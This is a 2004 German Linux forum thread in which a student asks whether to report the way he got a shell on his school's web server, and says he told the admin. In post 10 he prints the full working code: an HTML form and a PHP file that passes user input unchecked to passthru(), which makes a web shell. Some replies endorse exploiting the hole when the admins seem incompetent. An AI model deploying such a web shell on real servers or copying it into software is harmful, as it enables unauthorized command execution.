Moralische Frage...

Dieses Thema im Forum "Linux-Distributionen" wurde erstellt von bitumen, 12. Mai 2004.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. bitumen

    bitumen Megabyte

    Grüß Euch!

    Ich habe zwei kleine php dateien geschrieben, mit deren Hilfe man als user die Rechte des webservers erreichen kann. Ich habe es bereits am Schulserver getestet, es funktioniert problemlos. sprich: ich habe bash zugriff als "apache".

    Nun zur Frage: Was ist die korrekte Vorgangsweise?

    - Admin berichten?
    - später ev auf diversen Mailinglists posten?
    - nichts unternehmen?
    (- selber ausnützen?)

    Danke und tschööö, bitumen
     
  2. rapmaster

    rapmaster Halbes Gigabyte

    nicht auf einem system, das mit sorgfalt konfiguriert wurde.

    mfg
     
  3. Donmato

    Donmato Megabyte

    dann sei schön artig;)
    der bug is aber auf sehr vielen apache maschinen drauf:D :D :D
     
  4. bitumen

    bitumen Megabyte

    ich habe mit dem admin geredet, er hat nicht gewusst, woher die mail an root von apache kommt :D
    Er hat gemeint, dass er im sommer susi91 draufmacht, und ich sollte die lücke nicht ausnützen :aua: :bse:

    greez, bitu
     
  5. rapmaster

    rapmaster Halbes Gigabyte

    /me benutzt fbsd
    und bei fbsd gibt standardmäßig nur für users shells, die sich wirklich auch einloggen können.

    mfg
     
  6. bitumen

    bitumen Megabyte

    tja, passthru hat der admin in der schule nicht gesperrt, und der www-user unter suse heißt "wwwrun", hat ein home-verzeichnis und hat /bin/bash als shell. blöder gehts nich mehr :D
     
  7. rapmaster

    rapmaster Halbes Gigabyte

    1. bei mir ist
    passthru
    gesperrt
    2. für den user www gibt's kein login :)

    mfg
     
  8. bitumen

    bitumen Megabyte

    schau dir den code an, den habe ich eh schon gepostet. außerdem kann ich mit
    das passwort für apache ändern und dann schön via ssh einloggen :D
     
  9. rapmaster

    rapmaster Halbes Gigabyte

    glaub ich irgendwie nicht.
    gib mal code her

    und kannst du auch auf datein oberhalb von ~ von www zugreifen oder nur unterhalb von ~

    mfg
     
  10. bitumen

    bitumen Megabyte

    Danke schonmal, ich poste den code, damit ihr wisst, worum es geht:

    send.html:
    <html>
    <form action="recive.php" method="post">
    <table><tr><th>webbash</ht></tr>
    <tr><td>command:<input type="text" name="bashcommand" /></td></tr>
    <tr><td><input type="submit" name="sent" value="enter" /></td></tr>
    </table>
    </form>
    </html>



    recive.php:
    <html>
    <p>
    output:
    <br>
    <br>

    <?php
    $shcommand = $_POST['bashcommand'];

    $output = passthru($shcommand);
    echo $output;
    ?>

    <br>
    <hr>
    <a href=send.html>new command</a>
    </p>
    </html>
     
  11. sAcKrAttE 2ooo

    sAcKrAttE 2ooo Halbes Megabyte

    kommt drauf an :
    is der server nur mies konfiguriert oder is dasn genereller bug in der software ?
    bei letzerem würd ich den bug reporten und nen exploit bereitstellen damit die jungs auch grund haben ihr zeug zu fixen.
    bei ersterem gibts zumindest für mich 2 möglichkeiten : ists ne scheiss-schule, überhebliche admins mit 0 ahnung usw... dann ausnutzen, sonst melden.

    mfg Sr2k
     
  12. Also ich würde die Admins, wenn sie was unternehmen können, informieren, damit sie das Loch stopfen können.
    Allerdings in Foren, wo der Neuling einfach "n00b" genannt wird und der User der *** ist, würde ich?s ausnutzen!
     
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen